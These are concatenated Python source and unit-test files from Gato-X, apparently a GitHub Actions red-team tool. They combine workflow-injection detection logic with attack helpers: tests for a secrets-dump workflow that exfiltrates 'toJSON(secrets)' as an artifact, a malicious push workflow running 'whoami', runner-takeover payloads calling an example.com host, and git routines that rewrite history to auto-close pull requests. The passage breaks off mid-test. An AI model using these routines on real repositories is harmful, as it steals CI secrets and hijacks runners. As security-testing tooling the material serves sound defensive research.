from gatox.configuration.configuration_manager import ConfigurationManager
from gatox.workflow_parser.expression_parser import ExpressionParser
from gatox.workflow_parser.expression_evaluator import ExpressionEvaluator


@staticmethod
def check_sus(item):
    """
    Check if the given item starts with any of the predefined suspicious prefixes.

    This method is used to identify potentially unsafe or
    suspicious variables in a GitHub Actions workflow.
    It checks if the item starts with any of the prefixes
    defined in PREFIX_VALUES. These prefixes are typically
    used to reference variables in a GitHub Actions workflow,
    and if a user-controlled variable is referenced
    without proper sanitization, it could lead to a script
    injection vulnerability.

    Args:
        item (str): The item to check.

    Returns:
        bool: True if the item starts with any of the suspicious prefixes, False otherwise.
    """

    PREFIX_VALUES = ["needs.", "env.", "steps.", "jobs."]

    item_lower = item.lower()
    for prefix in PREFIX_VALUES:
        if item_lower.startswith(prefix):
            for safe_string in ConfigurationManager().WORKFLOW_PARSING[
                "SAFE_ISH_CONTEXTS"
            ]:
                if item_lower.endswith(safe_string):
                    break
            else:
                return True
    return False


@staticmethod
def check_pr_ref(item):
    """
    Checks if the given item contains any of the predefined pull request
    related values.

    This method is used to identify if a given item (typically a string)
    contains any of the values defined in PR_ISH_VALUES. These values are
    typically used to reference pull request related data in a GitHub Actions workflow.

    Args:
        item (str): The item to check.

    Returns:
        bool: True if the item contains any of the pull request related values, False otherwise.
    """
    for prefix in ConfigurationManager().WORKFLOW_PARSING["PR_ISH_VALUES"]:
        if prefix in item.lower() and "base" not in item.lower():
            return True
    return False


@staticmethod
def filter_tokens(tokens, strict=False):
    """
    This method filters the tokens from the contents of a step
    in a GitHub workflow for potentially unsafe or suspicious context expressions.

    Parameters:
    contents (str): The contents of a step in a GitHub workflow.

    The method uses a regular expression to find all context expressions in the contents.
    A context expression in a GitHub workflow is a string that starts with '${{' and ends with '}}'.
    The expression inside the curly braces is split by '.' into three parts.
    The first part must be a sequence of alphanumeric characters,
    the second part must also be a sequence of alphanumeric characters,
    and the third part can be any sequence of characters.

    The method then checks each found context expression in two ways:
    1. Against a list of known unsafe context expressions.
        If the context expression is found in the list, it is added to `tokens_knownbad`.
    2. Using the `check_sus` method. If `check_sus` returns
        True for a context expression, it is added to `tokens_sus`.

    The method returns a list of tokens that are either known to be unsafe or are considered suspicious.

    Returns:
    list: A list of unsafe or suspicious context expressions found in the contents.
    """
    # First we get known unsafe
    tokens_knownbad = [
        item
        for item in tokens
        if item.lower() in ConfigurationManager().WORKFLOW_PARSING["UNSAFE_CONTEXTS"]
    ]
    # And then we add anything referenced
    if not strict:
        tokens_sus = [item for item in tokens if check_sus(item)]
        tokens_knownbad.extend(tokens_sus)
    return tokens_knownbad


@staticmethod
def check_always_true(if_check):
    """Check if the if check is always true because it uses ${{ }} in combination with
    an expression or uses nested expressions.
    """
    # If it starts with an expression but ends without, then it
    # always will resolve to true.
    if if_check.strip().startswith("${{") and not if_check.endswith("}}"):
        return True


@staticmethod
def validate_if_check(if_check, variables):
    """Function used to validate each if check.
    The strategy here is to "fail open". If we cannot
    determine with certainty the check would fail in an injection
    or pwn request scenario then we return True, because we would rather
    not miss a potential vulnerability.
    """
    if not if_check:
        return True

    if check_always_true(if_check):
        return True

    parser = ExpressionParser(if_check)
    ast_root = parser.get_node()

    evaluator = ExpressionEvaluator(variables)
    result = evaluator.evaluate(ast_root)

    return result


@staticmethod
def decompose_action_ref(action_path, vars, repo_name):
    """ """
    action_parts = {
        "key": action_path,
        "path": action_path.split("@")[0] if "@" in action_path else action_path,
        "ref": action_path.split("@")[1] if "@" in action_path else "",
        "local": action_path.startswith("./"),
        "args": vars.get("with", {}),
    }

    if "docker://" in action_path or action_parts["path"].startswith("actions/"):
        # Gato-X doesn't support docker actions
        # and we ignore official GitHub actions for analysis.
        return None

    if not action_parts["local"]:
        path_parts = action_parts["path"].split("/")

        action_parts["repo"] = "/".join(path_parts[0:2])
        if len(path_parts) > 2:
            action_parts["path"] = "/".join(action_parts["path"].split("/")[2:])
        else:
            # Standard action path in base directory
            action_parts["path"] = ""
    else:
        action_parts["path"] = action_parts["path"][2:]
        action_parts["repo"] = repo_name

    return action_parts



import re

from unittest.mock import patch
from unittest.mock import MagicMock

from gatox.attack.secrets.secrets_attack import SecretsAttack


# From https://stackoverflow.com/questions/14693701/
# how-can-i-remove-the-ansi-escape-sequences-from-a-string-in-python
def escape_ansi(line):
    ansi_escape = re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]")
    return ansi_escape.sub("", line)


def test_create_secret_exil_yaml():
    """Test code to create a yaml to exfil repository secrets."""
    attacker = SecretsAttack(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
    )

    # Just use the util method to get our key.
    priv, pub = SecretsAttack._SecretsAttack__create_private_key()

    yaml = attacker.create_exfil_yaml(pub, "evilBranch")

    print(yaml)

    assert "${{ toJSON(secrets)}}" in yaml
    assert "actions/upload-artifact@v4" in yaml


@patch(
    "gatox.attack.secrets.secrets_attack.SecretsAttack._SecretsAttack__decrypt_secrets"
)
@patch(
    "gatox.attack.secrets.secrets_attack.SecretsAttack._SecretsAttack__create_private_key"
)
@patch("gatox.attack.attack.Api")
def test_secrets_dump(mock_api, mock_privkey, mock_dec, capsys):
    """Test secrets dump functionality."""
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "name": "test user",
        "scopes": ["repo", "workflow"],
    }
    mock_api.return_value.get_secrets.return_value = [{"name": "TEST_SECRET"}]
    mock_api.return_value.get_repo_org_secrets.return_value = []
    mock_api.return_value.get_repo_branch.return_value = 0
    pub_mock = """
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuA+sy+VjSRn+2irScEhy
UmS2fwJvBszSTjmS1RS1pDguC2gL0DxasqPdw3vHAzeIArvxg1+IJTthvJX3Ji+7
8YoI2gd7J7eKCD2NbdONrBNKqvj8CJUA4nY4BEbpP3zkThRb0fWyVJktCy+bgmS5
Lo7M/sS7urnh55onw9RwL9ETdWj7W2LdgfgF85DVervaJxrSTMdXVJWAzUiIwWTK
fNBiJ0n3Be1NTc6Q4U8ElI2yKp/Dgl7RfLp/FVAgPh6ARzelaCMqJRLW7Wojh5ik
1pKoJiWqLKUwjLX1IU5Xtnf5PDMSMXv0ytFAop0KCV3sJDZeo40bMmO3tijp0+2x
W0vTeApmhYliYKpeqDWi3tm6Je/aYmZQwVlLHmv/U0UyXk7MYI2g5K8MhlGZcIed
spS/Bmt9h87EyaA+dGbqUssk3PAPhDcT9qJ9bOtuCl/MwEF3G4rE0lvJdk82MP17
SymVapDpPHqlCOXpRJlZ3izm1eT4VzS9IAje/1qZdbGS0XsRbYswAhyaV6uyj3rk
9mDboT7sVz+qzpmeNzD8BoQw3N1fUEwnagag4Z5DCrHwvPK9qr+1kNzYbMf5np88
eLxB/rMtfZCjliw1O0DzkkAvH+HnCgufX594EJsr0LLYF6JasVtWM79EGqJaI5mF
w1M8xrm+PUM5qaWCANScuX8CAwEAAQ==
-----END PUBLIC KEY-----
    """

    mock_api.return_value.retrieve_workflow_artifact.return_value = {
        "lookup.txt": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "output_updated.json": "A" * 100,
    }
    mock_api.return_value.get_recent_workflow.return_value = 11111111
    mock_api.return_value.get_workflow_status.return_value = 1
    mock_priv = MagicMock()
    mock_priv.decrypt.return_value = "TestSymKey"
    mock_privkey.return_value = (mock_priv, "pub_mock")
    mock_dec.return_value = b'{"TEST_SECRET":"TEST_VALUE"}'

    gh_attacker = SecretsAttack(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
    )

    gh_attacker.secrets_dump("targetRepo", None, None, True, "exfil")

    captured = capsys.readouterr()

    print_output = captured.out

    assert "Decrypted and Decoded Secrets:" in escape_ansi(print_output)


@patch("gatox.attack.attack.Api")
def test_secrets_dump_baduser(mock_api, capsys):
    """Test secrets dump functionality with bad permissions."""
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "name": "test user",
        "scopes": ["repo"],
    }

    gh_attacker = SecretsAttack(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
    )

    gh_attacker.secrets_dump("targetRepo", None, None, True, "exfil")

    captured = capsys.readouterr()

    print_output = captured.out

    assert "The user does not have the necessary scopes to conduct this" in escape_ansi(
        print_output
    )


@patch("gatox.attack.attack.Api")
def test_secrets_dump_nosecret(mock_api, capsys):
    """Test secrets dump where repo has no secrets."""

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "name": "test user",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.get_secrets.return_value = []
    mock_api.return_value.get_repo_org_secrets.return_value = []

    gh_attacker = SecretsAttack(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
    )

    gh_attacker.secrets_dump("targetRepo", None, None, True, "exfil")

    captured = capsys.readouterr()
    print_output = captured.out

    assert "The repository does not have any accessible secrets" in escape_ansi(
        print_output
    )


@patch("gatox.attack.attack.Api")
def test_secrets_dump_branchexist(mock_api, capsys):
    """Test secrets dump where exfil branch already exists."""

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "name": "test user",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.get_secrets.return_value = [{"name": "TEST_SECRET"}]
    mock_api.return_value.get_repo_org_secrets.return_value = []
    mock_api.return_value.get_repo_branch.return_value = 1

    gh_attacker = SecretsAttack(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
    )

    gh_attacker.secrets_dump("targetRepo", "exfilbranch", None, True, "exfil")

    captured = capsys.readouterr()
    print_output = captured.out

    assert "Remote branch, exfilbranch, already exists!" in escape_ansi(print_output)


@patch("gatox.attack.attack.Api")
def test_secrets_dump_branchfail(mock_api, capsys):
    """Test secrets dump where branch check fails."""

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "name": "test user",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.get_secrets.return_value = [{"name": "TEST_SECRET"}]
    mock_api.return_value.get_repo_org_secrets.return_value = []
    mock_api.return_value.get_repo_branch.return_value = -1

    gh_attacker = SecretsAttack(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
    )

    gh_attacker.secrets_dump("targetRepo", "exfilbranch", None, True, "exfil")

    captured = capsys.readouterr()
    print_output = captured.out

    assert "Failed to check for remote branch!" in escape_ansi(print_output)



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import re

from gatox.workflow_parser.components.step import Step
from gatox.workflow_parser.expression_parser import ExpressionParser
from gatox.workflow_parser.expression_evaluator import ExpressionEvaluator
from gatox.configuration.configuration_manager import ConfigurationManager


class Job:
    """Wrapper class for a Github Actions workflow job."""

    LARGER_RUNNER_REGEX_LIST = re.compile(
        r"(windows|ubuntu)-(22.04|20.04|2019-2022)-(4|8|16|32|64)core-(16|32|64|128|256)gb"
    )
    MATRIX_KEY_EXTRACTION_REGEX = re.compile(r"{{\s*matrix\.([\w-]+)\s*}}")

    EVALUATOR = ExpressionEvaluator()

    def __init__(self, job_data: dict, job_name: str):
        """Constructor for job wrapper."""
        self.job_name = job_name
        self.job_data = job_data
        self.needs = []
        self.steps = []
        self.env = {}
        self.permissions = []
        self.deployments = []
        self.if_condition = None
        self.uses = None
        self.caller = False
        self.external_caller = False
        self.has_gate = False
        self.needs = None
        self.evaluated = False

        if "environment" in self.job_data:
            if type(self.job_data["environment"]) == list:
                self.deployments.extend(self.job_data["environment"])
            else:
                self.deployments.append(self.job_data["environment"])

        if "env" in self.job_data:
            self.env = self.job_data["env"]

        if "permissions" in self.job_data:
            self.permissions = self.job_data["permissions"]

        if "if" in self.job_data:
            self.if_condition = self.job_data["if"]

        if "needs" in self.job_data:
            self.needs = self.job_data["needs"]

        if "uses" in self.job_data:
            if self.job_data["uses"].startswith("./"):
                self.uses = self.job_data["uses"]
                self.caller = True
            else:
                self.uses = self.job_data["uses"]
                self.external_caller = True

        if "steps" in self.job_data:
            self.steps = []

            for step in self.job_data["steps"]:
                added_step = Step(step)
                if added_step.is_gate:
                    self.has_gate = True
                self.steps.append(added_step)

    def evaluateIf(self):
        """Evaluate the If expression by parsing it into an AST
        and then evaluating it in the context of an external user
        triggering it.
        """
        if self.if_condition and not self.evaluated:
            try:
                parser = ExpressionParser(self.if_condition)
                if self.EVALUATOR.evaluate(parser.get_node()):
                    self.if_condition = f"EVALUATED: {self.if_condition}"
                else:
                    self.if_condition = f"RESTRICTED: {self.if_condition}"

            except ValueError as ve:
                self.if_condition = self.if_condition
            except NotImplementedError as ni:
                self.if_condition = self.if_condition
            except (SyntaxError, IndexError) as e:
                self.if_condition = self.if_condition
            finally:
                self.evaluated = True

        return self.if_condition

    def __process_runner(self, runs_on):
        """
        Processes the runner for the job.
        """
        if type(runs_on) is list:
            for label in runs_on:
                if (
                    label
                    in ConfigurationManager().WORKFLOW_PARSING["GITHUB_HOSTED_LABELS"]
                ):
                    break
                if self.LARGER_RUNNER_REGEX_LIST.match(label):
                    break
            else:
                return True
        elif type(runs_on) is str:
            if (
                runs_on
                in ConfigurationManager().WORKFLOW_PARSING["GITHUB_HOSTED_LABELS"]
            ):
                return False
            if self.LARGER_RUNNER_REGEX_LIST.match(runs_on):
                return False
            return True

    def __process_matrix(self, runs_on):
        """Process case where runner is specified via matrix."""
        matrix_match = self.MATRIX_KEY_EXTRACTION_REGEX.search(runs_on)

        if matrix_match:
            matrix_key = matrix_match.group(1)
        else:
            return False
        # Check if strategy exists in the yaml file
        if "strategy" in self.job_data and "matrix" in self.job_data["strategy"]:
            matrix = self.job_data["strategy"]["matrix"]

            # Use previously acquired key to retrieve list of OSes
            if matrix_key in matrix:
                os_list = matrix[matrix_key]
            elif "include" in matrix:
                inclusions = matrix["include"]
                os_list = []
                for inclusion in inclusions:
                    if matrix_key in inclusion:
                        os_list.append(inclusion[matrix_key])
            else:
                return False

            # We only need ONE to be self hosted, others can be
            # GitHub hosted
            for key in os_list:
                if type(key) is str:
                    if key not in ConfigurationManager().WORKFLOW_PARSING[
                        "GITHUB_HOSTED_LABELS"
                    ] and not self.LARGER_RUNNER_REGEX_LIST.match(key):
                        return True
                # list of labels
                elif type(key) is list:
                    return True

    def gated(self):
        """Check if the workflow is gated."""
        return self.has_gate or (
            self.evaluateIf() and self.evaluateIf().startswith("RESTRICTED")
        )

    def getJobDependencies(self):
        """Returns Job objects for jobs that must complete
        successfully before this one.
        """
        return self.needs

    def isCaller(self):
        """Returns true if the job is a caller (meaning it
        references a reusable workflow that runs on workflow_call)
        """
        return self.caller

    def isSelfHosted(self):
        """Returns true if the job might run on a self-hosted runner."""
        if "runs-on" in self.job_data:
            runs_on = self.job_data["runs-on"]
            # Easy
            if "self-hosted" in runs_on:
                return True
            # Process a matrix job
            elif "matrix." in runs_on:
                return self.__process_matrix(runs_on)
            # Process standard label
            else:
                return self.__process_runner(runs_on)



import tempfile
import os
import subprocess
import logging
import hashlib
import yaml
from yaml import CSafeLoader

logger = logging.getLogger(__name__)


class Git:
    """This class is utilized to perfome a clone of a git repository using a
    PAT (sparse or otherwise) in order to perform deeper analysis on the
    repository content.
    """

    def __init__(
        self,
        pat,
        repo_name: str,
        username="Gato-X",
        email="gato-x@pwn.com",
        proxies=None,
        github_url="github.com",
    ):
        """Initialize the git abstraction class. This class managed a
        checked-out git repository located in a temporary directory.

        The directory is cleaned up upon object destruction, or can be manually
        cleaned up using a delete command.

        Args:
            pat (str): GitHub personal access token with necessary scopes.
            repo_name (str): Name of repository to interact with.
            username (str, optional): Username for the git commit
            email (str, optional): Email for the git commit
            http_proxy (str, optional): Clone through an HTTP proxy.
            Defaults to None.
            socks_proxy (str, optional): Clone through a SOCKS proxy.
            Defaults to None.
        """
        self.cloned = False
        if not github_url:
            self.github_url = "github.com"
        else:
            self.github_url = github_url

        if self.github_url != "github.com" or proxies:
            os.environ["GIT_SSL_NO_VERIFY"] = "True"

        if proxies:
            os.environ["ALL_PROXY"] = proxies["https"]

        self.clone_comamnd = (
            "git clone --depth 1 --filter=blob:none --sparse"
            f" https://{pat}@{self.github_url}/{repo_name}"
        )

        self.config_command1 = f"git config user.name '{username}'"

        self.config_command2 = f"git config user.email '{email}'"

        if len(repo_name.split("/")) != 2:
            raise ValueError("Repository name but be in Org/Repo format!")
        self.repo_name = repo_name

    def __run_command(self, command):
        """ """
        p = subprocess.Popen(
            command.split(" "),
            cwd=self.temp_folder.name,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )

        output, error = p.communicate()
        return output.decode("utf-8"), error.decode("utf-8")

    def __get_last_commit_date(self, branch):
        output, _ = self.__run_command(f"git log -1 --format=%cd --date=short {branch}")
        return output.strip()

    def __get_file_hash(self, file_path):
        with open(os.path.join(self.temp_folder.name, file_path), "rb") as file:
            file_hash = hashlib.sha256(file.read()).hexdigest()
        return file_hash

    def get_non_default(self):
        """
        Identifies and returns a list of branches containing .yml or .yaml files in the .github/workflows directory
        that use the 'pull_request_target' event and do not match the file hash of the same file in the main branch.
        This is used to find potential security risks in GitHub Actions workflows across all branches except the main branch.

        The method performs the following steps:
        1. Initializes a temporary git repository and configures it for sparse checkout to only include .yml and .yaml files.
        2. Fetches the default branch of the remote repository and checks it out.
        3. Pulls the latest changes from the main branch and collects the hashes of all .yml files in the .github/workflows directory.
        4. Iterates over all branches (except the main branch), checking out each branch and:
        a. Collects the last commit date.
        b. Searches for .yml or .yaml files that contain the 'pull_request_target' event.
        c. Compares the hash of each file against the hash of the same file in the main branch to ensure they are different.
        d. Checks if the file does not include '/checkout' action, indicating a potential security risk.
        e. Collects information about branches that match the criteria, including the branch name, file path, file content, and last commit date.

        Returns:
            A list of tuples, each containing:
            - The branch name
            - The file path of the .yml or .yaml file
            - The content of the file
            - The date of the last commit for the branch

        Note:
            This method uses a temporary directory for the git operations and cleans up after itself.
            It also handles exceptions by printing an error message but does not stop execution.
        """
        self.temp_folder = tempfile.TemporaryDirectory()
        self.__run_command("git init")
        # Add the remote repository
        self.__run_command(
            f"git remote add origin https://{self.github_url}/{self.repo_name}.git"
        )

        # Enable sparse checkout
        self.__run_command("git config core.sparseCheckout true")

        self.__run_command("git config submodule.recurse false")
        self.__run_command("git config index.sparse true")
        self.__run_command("git sparse-checkout init --sparse-index")
        self.__run_command('git sparse-checkout set "**/*.yml **/*.yaml"')
        # Create the sparse-checkout file
        with open(
            os.path.join(self.temp_folder.name, ".git/info/sparse-checkout"), "w"
        ) as file:
            file.write(".github/workflows")

        self.__run_command("git fetch --no-tags --depth 1 --filter=blob:none")
        def_branch = self.__run_command(
            "git remote show origin | grep 'HEAD branch' | cut -d' ' -f5"
        )[0].replace("\n", "")
        self.__run_command(f"git checkout {def_branch}")

        # Dictionary to store file hashes from the main branch
        main_file_hashes = {}
        # just get main
        self.__run_command("git pull")
        # Get the file hashes from the main branch
        output, _ = self.__run_command("git ls-files .github/workflows/*.yml")
        yml_files = output.split("\n")
        for file in yml_files:
            if file:
                main_file_hashes[file] = self.__get_file_hash(file)

        # Get the list of all branches
        output, _ = self.__run_command("git branch -r")
        branches = [branch.strip() for branch in output.split("\n") if branch.strip()]
        hash_cache = set()
        values = []
        # Iterate over each branch
        for branch in branches:
            # Skip the main branch
            if branch == f"origin/{def_branch}":
                continue

            # Checkout the branch
            self.__run_command(f"git checkout {branch}")
            # Get the date of the last commit for the branch
            last_commit_date = self.__get_last_commit_date(branch)
            # Check if the branch contains a .yml file with pull_request_target
            output, _ = self.__run_command("git ls-files .github/workflows/*.yml")
            output2, _ = self.__run_command("git ls-files .github/workflows/*.yaml")
            yml_files = output.split("\n")
            yml_files.extend(output2.split("\n"))

            for file in yml_files:
                if file:
                    with open(os.path.join(self.temp_folder.name, file), "r") as f:
                        content = f.read()
                        if "pull_request_target" in content:
                            try:
                                parsed_yaml = yaml.load(
                                    content.replace("\t", "  "), Loader=CSafeLoader
                                )
                                file_hash = self.__get_file_hash(file)
                                if file_hash == main_file_hashes.get(file):
                                    continue

                                if file_hash not in hash_cache:
                                    hash_cache.add(file_hash)
                                else:
                                    # Only report once per hash
                                    continue

                                if "/checkout" not in content:
                                    continue

                                if (
                                    "on" in parsed_yaml
                                    and "pull_request_target" in parsed_yaml["on"]
                                ):
                                    vals = parsed_yaml["on"]["pull_request_target"]
                                    if not vals or "branches" not in vals:
                                        values.append(
                                            (branch, file, content, last_commit_date)
                                        )
                                    elif vals and "branches" in vals:
                                        branch_matchers = vals["branches"]
                                        for br in branch_matchers:
                                            if (
                                                br.replace("*", "", 2)
                                                in branch.split("/")[-1]
                                            ):
                                                values.append(
                                                    (
                                                        branch,
                                                        file,
                                                        content,
                                                        last_commit_date,
                                                    )
                                                )
                            except Exception as e:
                                print(e)
                                print("Error!")
        return values

    def perform_clone(self):
        """Performs the actual git clone operation.

        Returns:
            bool: True if the git clone operation was successful, False
            otherwise.
        """

        self.temp_folder = tempfile.TemporaryDirectory()

        try:
            new_wd = self.repo_name.split("/")[1]

            p = subprocess.Popen(
                self.clone_comamnd.split(" "),
                cwd=self.temp_folder.name,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p.wait()

            if p.returncode != 0:
                logger.error("Git clone operation did not succeed!")
                raise Exception("Git clone operation did not suceeed!")

            p = subprocess.Popen(
                self.config_command1.split(" "),
                cwd=os.path.join(self.temp_folder.name, new_wd),
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p.wait()

            p = subprocess.Popen(
                self.config_command2.split(" "),
                cwd=os.path.join(self.temp_folder.name, new_wd),
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p.wait()

            p1 = subprocess.Popen(
                "git sparse-checkout set .github".split(" "),
                cwd=os.path.join(self.temp_folder.name, new_wd),
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p1.wait()

            if p1.returncode != 0:
                logger.error("Git checkout operation did not succeed!")
                raise Exception("Git checkout operation did not suceeed!")
            self.cloned = True

        except Exception as e:
            logging.error(f"Exception during git clone of {self.repo_name}!")
            logging.error(f"Exception details: {str(e)}")
            if self.temp_folder:
                self.temp_folder.cleanup()
            return False

        return self.cloned

    def extract_workflow_ymls(self, repo_path: str = None):
        """Extracts and returns all github workflow .yml files located within
        the cloned repository.

        Args:
            repo_path (str, optional): Path on disk to repository to extract
            workflow yml files from. Defaults to repository associated with
            this object. Parameter intended for future uses and unit testing.
        Returns:
            list: List of yml files read from repository.
        """
        new_wd = self.repo_name.split("/")[1]

        if not repo_path:
            repo_path = self.temp_folder.name

        ymls = []

        if os.path.isdir(os.path.join(repo_path, new_wd, ".github", "workflows")):
            workflows = os.listdir(
                os.path.join(repo_path, new_wd, ".github", "workflows")
            )

            for wf in workflows:
                wf_p = os.path.join(repo_path, new_wd, ".github", "workflows", wf)
                if os.path.isfile(wf_p):
                    with open(
                        wf_p,
                        "r",
                    ) as wf_in:
                        wf_yml = wf_in.read()

                        ymls.append((wf, wf_yml))
        return ymls

    def rewrite_commit(self, repo_path=None):
        """Rewrites commit history for repo so that it auto-closes the pull
        request.

        Args:
            repo_path (str, optional): Optional path to repo, otherwise uses
            the repository associated with this class. Mostly for unit testing.
            Defaults to None.

        Returns:
            bool: True if the commit was successfully re-written.
        """

        git_rebase = "git rebase -i HEAD^"

        repo_path = repo_path if repo_path else self.temp_folder.name
        new_wd = self.repo_name.split("/")[1]

        try:

            p = subprocess.Popen(
                git_rebase.split(" "),
                cwd=os.path.join(repo_path, new_wd),
                env={
                    **os.environ,
                    **{"GIT_SEQUENCE_EDITOR": "sed -i.bak 's/pick/drop/g'"},
                },
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p.wait()

        except Exception as e:
            logging.error("Exception during rebase!")
            logging.error(f"Exception details: {str(e)}")
            if self.temp_folder:
                self.temp_folder.cleanup()
            return False

        return True

    def commit_file(
        self,
        file_content: bytes,
        file_path: str,
        repo_path: str = None,
        message: str = "Test Commit",
    ):
        """Commit a file containing the provided content at the provided
        path.

        Args:
            repo_path (str, optional): Optional path to repo, otherwise uses
            the repository associated with this class. Mostly for unit testing.
            Defaults to None.

        Returns:
            str: The SHA1 hash of the HEAD revision, None if there was a
            failure.
        """
        repo_path = repo_path if repo_path else self.temp_folder.name
        new_wd = self.repo_name.split("/")[1]
        write_path = os.path.join(repo_path, new_wd, file_path)
        add_command = f"git add {file_path}"
        commit_command = "git commit -m"
        rev_parse = "git rev-parse HEAD"

        ret = None

        try:
            os.makedirs(os.path.dirname(write_path), exist_ok=True)
            with open(write_path, "wb") as outfile:
                outfile.write(file_content)

            p = subprocess.Popen(
                add_command.split(" "),
                cwd=os.path.join(repo_path, new_wd),
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p.wait()

            if p.returncode != 0:
                logger.error("Git add operation did not succeed!")
                raise Exception("Git add operation did not succeed!")

            cmd = commit_command.split(" ")
            cmd.append(message)
            p1 = subprocess.Popen(
                cmd,
                cwd=os.path.join(repo_path, new_wd),
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            p1.wait()

            if p1.returncode != 0:
                logger.error("Git commit operation did not succeed!")
                raise Exception("Git commit operation did not suceeed!")

            p2 = subprocess.Popen(
                rev_parse.split(" "),
                cwd=os.path.join(repo_path, new_wd),
                stdout=subprocess.PIPE,
                stderr=subprocess.DEVNULL,
            )
            p2.wait()

            if p2.returncode != 0:
                logger.error("Git rev-parse operation did not succeed!")
                raise Exception("Git rev-parse operation did not succeed!")

            ret = p2.communicate()[0].decode().strip()
        except Exception as e:
            logging.error("Exception during git commit!")
            logging.error(f"Exception details: {str(e)}")
            if self.temp_folder:
                self.temp_folder.cleanup()

        return ret

    def push_repository(
        self, upstream_branch: str, force: bool = False, repo_path: str = None
    ):
        """Push to the remote repository.

        Args:
            upstream_branch (str): Name of upstream branch to push as.
            force (bool, optional): Whether the push should be forced. Defaults
            to False.
            repo_path (str, optional): Optional path to repo, otherwise uses
            the repository associated with this class. Mostly for unit testing.
            Defaults to None.

        Returns:
            bool: True if the push operation was successful.

        """
        rev_parse = "git rev-parse --abbrev-ref HEAD"
        repo_path = repo_path if repo_path else self.temp_folder.name

        new_wd = self.repo_name.split("/")[1]

        p = subprocess.Popen(
            rev_parse.split(" "),
            cwd=os.path.join(repo_path, new_wd),
            stdout=subprocess.PIPE,
            stderr=subprocess.DEVNULL,
        )
        p.wait()

        # Need to decode and strip the newline off.
        branch_name = p.communicate()[0].decode().strip()

        push_command = f"git push --set-upstream origin {branch_name}:{upstream_branch}"
        if force:
            push_command += " -f"

        logger.info(f"Executing: {push_command}")
        p1 = subprocess.Popen(
            push_command.split(" "),
            cwd=os.path.join(repo_path, new_wd),
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        p1.wait()

        if p1.returncode != 0:
            logger.error("Git push operation did not succeed!")
            return False

        return True

    def delete_branch(self, target_branch: str, repo_path: str = None):
        """Deletes a branch on the remote repository.

        Args:
            target_branch (str): Name of the branch to delete.
            repo_path (str, optional): Optional path to repo, otherwise uses
            the repository associated with this class. Mostly for unit testing.
            Defaults to None.

        Returns:
            bool: True of the branch was successfully deleted, False otherwise.
        """
        delete_command = f"git push origin --delete {target_branch} -f"
        repo_path = repo_path if repo_path else self.temp_folder.name

        new_wd = self.repo_name.split("/")[1]

        p = subprocess.Popen(
            delete_command.split(" "),
            cwd=os.path.join(repo_path, new_wd),
            stdout=subprocess.PIPE,
            stderr=subprocess.DEVNULL,
        )
        p.wait()

        if p.returncode != 0:
            logger.error(
                f"Git push to delete branch {target_branch} " "did not succeed!"
            )
            return False

        return True

    def __del__(self):
        """Destructor for the object, cleans up the temporary directory."""
        if self.cloned:
            self.temp_folder.cleanup()



import pytest
import os
import pathlib

from unittest.mock import patch, ANY, mock_open

from gatox.workflow_parser.composite_parser import CompositeParser

TEST_COMPOSITE = """
name: ci-lint-charts
description: Lint helm charts

runs:
  using: composite
  steps:
    - name: Checkout repo
      uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4.1.7
    - name: Print title
      shell: bash
      run: |
        echo "${{ github.event.pull_request.title }}"
"""


def test_parse_composite():
    """Test for parsing a composite action."""
    parser = CompositeParser(TEST_COMPOSITE)
    assert parser.is_composite() == True
    assert len(parser.check_injection()) == 1



from gatox.attack.cicd_attack import CICDAttack
from gatox.attack.payloads.payloads import Payloads


def test_create_malicious_push_yaml():
    """Test code to create a malicious yaml file"""
    yaml = CICDAttack.create_push_yml("whoami", "testing")

    assert "run: whoami" in yaml


def test_ror_workflow_default():

    workflow = Payloads.create_ror_workflow(
        "foobar",
        "evil",
        "https://example.com",
        runner_labels=["self-hosted", "super-secure"],
    )

    assert "continue-on-error: true" in workflow


def test_ror_workflow_win():

    workflow = Payloads.create_ror_workflow(
        "foobar",
        "evil",
        "https://example.com",
        runner_labels=["self-hosted", "super-secure"],
        target_os="win",
